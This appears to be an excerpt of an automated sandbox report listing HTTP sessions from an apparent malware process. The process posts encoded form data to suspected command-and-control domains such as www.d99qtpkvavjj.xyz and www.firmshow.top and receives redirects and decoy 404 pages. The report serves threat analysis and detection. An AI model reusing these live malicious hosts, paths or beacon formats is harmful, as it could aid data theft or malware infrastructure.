Data Ascii: {"status": "6001","msg": "fail","result":"获取信息失败"} (the "result" value is UTF-8 Chinese, "failed to obtain information", present in the raw bytes above but dropped by the report's ASCII rendering)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49721 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:18.858448982 CEST | 758 | OUT | POST /r4rr/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.d99qtpkvavjj.xyz
                                                          Origin: http://www.d99qtpkvavjj.xyz
                                                          Referer: http://www.d99qtpkvavjj.xyz/r4rr/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 6a 2f 73 42 68 58 72 36 6b 6b 72 36 34 42 30 48 47 67 4c 6f 47 76 52 4c 2b 72 54 7a 37 68 5a 57 39 68 7a 64 78 6f 7a 51 4b 65 46
                                                          Data Ascii: GBbljTO=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzj/sBhXr6kkr64B0HGgLoGvRL+rTz7hZW9hzdxozQKeF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49722 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:21.389283895 CEST | 782 | OUT | POST /r4rr/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.d99qtpkvavjj.xyz
                                                          Origin: http://www.d99qtpkvavjj.xyz
                                                          Referer: http://www.d99qtpkvavjj.xyz/r4rr/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 78 79 57 51 64 4b 59 2f 2f 55 62 71 73 69 69 6a 4b 37 5a 4f 33 39 2f 59 46 71 34 54 6c 6f 74 50 37 6f 74 4b 69 39 2b 70 4e 70 50 77 54 39 71 70 79 62 52 52 53 36 65 6d 5a 48 42 6d 48 48 35 70 4a 68 52 44 79 48 74 35 34 61 57 51 65 2f 66 68 4a 35 53 49 32 61 6d 67 57 59 45 78 46 69 57 48 34 72 59 67 45 45 6a 75 69 4e 68 2f 54 69 4b 71 32 53 6d 52 33 36 32 37 4b 52 78 6f 65 42 54 79 46 59 69 63 62 52 4b 51 71 75 78 75 64 75 6d 37 6d 64 47 47 35 41 6d 49 49 67 58 37 70 54 77 49 32 75 41 75 62 31 67 6f 36 57 50 54 4c 38 7a 68 7a 62 68 7a 55 39 5a 7a 50 6d 6b 55 66 2b 37 6d 66 56 6f 50 58 4d 35 74 4c 4a 6d 59 61 63 4a 76 55 39 46 72 70 51 3d 3d
                                                          Data Ascii: GBbljTO=C3FIcjbM8hgqxyWQdKY//UbqsiijK7ZO39/YFq4TlotP7otKi9+pNpPwT9qpybRRS6emZHBmHH5pJhRDyHt54aWQe/fhJ5SI2amgWYExFiWH4rYgEEjuiNh/TiKq2SmR3627KRxoeBTyFYicbRKQquxudum7mdGG5AmIIgX7pTwI2uAub1go6WPTL8zhzbhzU9ZzPmkUf+7mfVoPXM5tLJmYacJvU9FrpQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49723 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:23.920151949 CEST | 1795 | OUT | POST /r4rr/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.d99qtpkvavjj.xyz
                                                          Origin: http://www.d99qtpkvavjj.xyz
                                                          Referer: http://www.d99qtpkvavjj.xyz/r4rr/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 78 79 57 51 64 4b 59 2f 2f 55 62 71 73 69 69 6a 4b 37 5a 4f 33 39 2f 59 46 71 34 54 6c 6f 6c 50 38 61 6c 4b 7a 73 2b 70 4d 70 50 77 4e 4e 71 6b 79 62 51 55 53 36 48 76 5a 48 63 62 48 46 42 70 4a 44 31 44 30 79 42 35 7a 61 57 51 42 76 66 67 4e 35 53 64 32 61 32 38 57 59 30 78 46 69 57 48 34 71 49 67 58 78 50 75 67 4e 68 38 55 69 4b 63 6b 69 6e 32 33 36 4f 4e 4b 51 46 6e 65 53 62 79 4c 63 47 63 59 6a 79 51 33 65 78 73 51 4f 6d 6a 6d 63 37 63 35 44 43 71 49 67 6a 56 70 55 59 49 30 5a 6c 46 50 33 63 77 76 57 44 71 49 72 44 58 33 65 68 36 5a 63 31 78 50 6e 51 4a 58 4e 2f 53 59 56 34 34 64 39 41 4d 49 62 71 78 51 59 63 6c 5a 74 49 4f 79 49 79 4c 30 67 67 48 36 2f 6b 4e 59 74 63 63 4d 2f 70 41 74 6b 49 43 51 65 67 67 6f 75 37 4f 57 53 47 32 32 31 32 72 54 65 69 56 72 56 64 45 37 43 52 54 43 68 53 33 31 76 45 6a 79 4b 73 35 45 39 7a 73 44 51 4e 64 6b 77 4d 4e 6f 51 54 41 4d 78 75 6c 61 52 53 46 79 4d 76 43 6b 33 71 6e 39 6c 41 64 32 67 2f 4e 62 7a [TRUNCATED]
Data Ascii: GBbljTO= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49724 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:26.452953100 CEST | 486 | OUT | GET /r4rr/?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.d99qtpkvavjj.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jul 2, 2024 14:03:26.939934969 CEST | 408 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:03:26 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 42 3d 72 4c 34 6c 50 26 47 42 62 6c 6a 54 4f 3d 50 31 74 6f 66 56 58 74 79 31 34 30 78 42 53 56 50 70 49 57 37 67 79 69 72 56 76 62 62 71 34 5a 6d 74 76 52 4d 66 51 33 76 49 4e 70 39 37 55 2b 6a 50 65 4b 4f 70 62 4e 66 2f 7a 68 78 70 42 65 55 59 54 61 46 31 63 62 59 31 64 79 4a 77 4a 55 7a 68 6c 6a 6c 71 44 44 57 34 48 44 48 59 62 4c 79 5a 71 77 47 6f 67 33 50 51 47 53 67 59 59 4f 53 57 79 47 6f 38 31 4b 62 53 57 72 6b 67 79 72 78 36 36 4e 4c 56 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49727 | 203.161.43.228 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:32.153460026 CEST | 746 | OUT | POST /02nb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.firmshow.top
                                                          Origin: http://www.firmshow.top
                                                          Referer: http://www.firmshow.top/02nb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 34 52 75 38 64 6e 31 4e 2b 44 46 7a 47 4a 53 35 52 30 2b 4c 56 39 46 6f 33 74 6b 6e 51 37 39 61 44 34 35 72 61 45 4a 65 6f 4f 64 4e 6b 6c 6a 33 4d 6d 33 67 74 43 73 58 61 63 64 75 57 2b 49 30 63 55 36 33 45 73 2f 2f 46 4f 77 6e 63 4d 4f 74 31 66 4d 30 50 69 45 76 53 65 2f 6e 55 67 59 58 31 71 54 41 6e 46 66 31 43 31 38 79 4d 5a 53 75 61 32 70 44 31 38 41 48 4e 78 4a 4b 43 41 72 77 63 59 54 38 6b 7a 58 41 33 53 6e 2b 63 68 46 2b 50 47 70 43 75 4c 79 36 74 32 52 59 77 49 31 43 68 6b 32 38 58 51 61 7a 62 4b 73 43 64 6f 44 71 55 56 6a 7a 39 57 4c 65 54 30 72 66 77 49 31 65
                                                          Data Ascii: GBbljTO=9CkU3kfti4H24Ru8dn1N+DFzGJS5R0+LV9Fo3tknQ79aD45raEJeoOdNklj3Mm3gtCsXacduW+I0cU63Es//FOwncMOt1fM0PiEvSe/nUgYX1qTAnFf1C18yMZSua2pD18AHNxJKCArwcYT8kzXA3Sn+chF+PGpCuLy6t2RYwI1Chk28XQazbKsCdoDqUVjz9WLeT0rfwI1e
Jul 2, 2024 14:03:32.854695082 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:32 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49728 | 203.161.43.228 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:34.684638023 CEST | 770 | OUT | POST /02nb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.firmshow.top
                                                          Origin: http://www.firmshow.top
                                                          Referer: http://www.firmshow.top/02nb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 70 41 65 38 63 48 4a 4e 2f 6a 46 38 4a 70 53 35 62 55 2b 50 56 39 42 6f 33 76 4a 71 51 75 74 61 44 61 78 72 62 47 68 65 6c 75 64 4e 38 56 6a 79 42 47 32 73 74 43 6f 70 61 64 68 75 57 39 30 30 63 57 79 33 44 66 6e 38 66 2b 77 6c 55 73 4f 76 37 2f 4d 30 50 69 45 76 53 65 72 5a 55 67 51 58 32 62 6a 41 6e 68 44 32 42 31 39 41 4c 5a 53 75 4c 47 70 48 31 38 41 6c 4e 77 55 76 43 43 54 77 63 5a 50 38 6c 69 58 48 39 53 6e 34 53 42 45 72 48 6b 77 49 73 49 54 4f 6d 57 31 34 78 76 4e 58 74 79 33 6d 4c 6a 61 51 4a 61 4d 41 64 71 62 59 55 31 6a 5a 2f 57 7a 65 42 6a 6e 34 2f 38 51 39 77 45 2f 4b 44 75 42 58 72 68 71 74 7a 33 2b 55 42 58 32 44 51 67 3d 3d
                                                          Data Ascii: GBbljTO=9CkU3kfti4H2pAe8cHJN/jF8JpS5bU+PV9Bo3vJqQutaDaxrbGheludN8VjyBG2stCopadhuW900cWy3Dfn8f+wlUsOv7/M0PiEvSerZUgQX2bjAnhD2B19ALZSuLGpH18AlNwUvCCTwcZP8liXH9Sn4SBErHkwIsITOmW14xvNXty3mLjaQJaMAdqbYU1jZ/WzeBjn4/8Q9wE/KDuBXrhqtz3+UBX2DQg==
Jul 2, 2024 14:03:35.380281925 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:35 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49729 | 203.161.43.228 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:03:37.215337992 CEST | 1783 | OUT | POST /02nb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.firmshow.top
                                                          Origin: http://www.firmshow.top
                                                          Referer: http://www.firmshow.top/02nb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 70 41 65 38 63 48 4a 4e 2f 6a 46 38 4a 70 53 35 62 55 2b 50 56 39 42 6f 33 76 4a 71 51 74 4e 61 44 70 70 72 61 6e 68 65 6b 75 64 4e 78 31 6a 7a 42 47 33 32 74 44 4d 74 61 64 74 59 57 34 34 30 54 54 2b 33 47 75 6e 38 4b 75 77 6c 57 73 4f 69 31 66 4d 62 50 69 55 7a 53 65 37 5a 55 67 51 58 32 5a 72 41 75 56 66 32 4e 56 38 79 4d 5a 53 55 61 32 70 76 31 38 35 61 4e 77 52 61 44 79 7a 77 46 35 66 38 6e 55 37 48 78 53 6e 36 52 42 46 6f 48 6b 4d 4c 73 49 4f 33 6d 57 42 43 78 6f 39 58 75 47 65 39 59 52 4f 6b 51 5a 41 53 43 6f 6a 54 55 51 7a 64 2f 48 66 2b 41 31 58 31 67 4e 51 4e 70 43 33 76 50 2b 41 73 73 52 4f 68 2f 68 32 47 53 6d 48 38 55 77 74 34 4e 7a 55 67 39 35 34 48 6f 4e 6b 2f 50 50 6e 4d 50 48 65 62 6f 55 69 72 38 44 38 52 4b 45 4e 35 77 7a 69 76 72 35 34 53 30 67 76 48 5a 2f 34 36 67 79 52 53 33 6d 31 33 54 4f 75 2f 6c 5a 70 74 47 37 51 52 45 46 33 35 31 37 6d 38 65 63 32 63 53 64 50 39 53 6f 53 77 57 4c 73 59 56 5a 55 62 31 4a 38 6d 42 6b [TRUNCATED]
                                                          Data Ascii: GBbljTO=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 [TRUNCATED]
                                                          Jul 2, 2024 14:03:37.883249998 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:37 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.6 | 49730 | 203.161.43.228 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:03:39.747488022 CEST | 482 | OUT | GET /02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.firmshow.top
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:03:40.370306969 CEST | 673 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:40 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.6 | 49731 | 38.47.158.215 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:03:46.202683926 CEST | 737 | OUT | POST /g67v/ HTTP/1.1
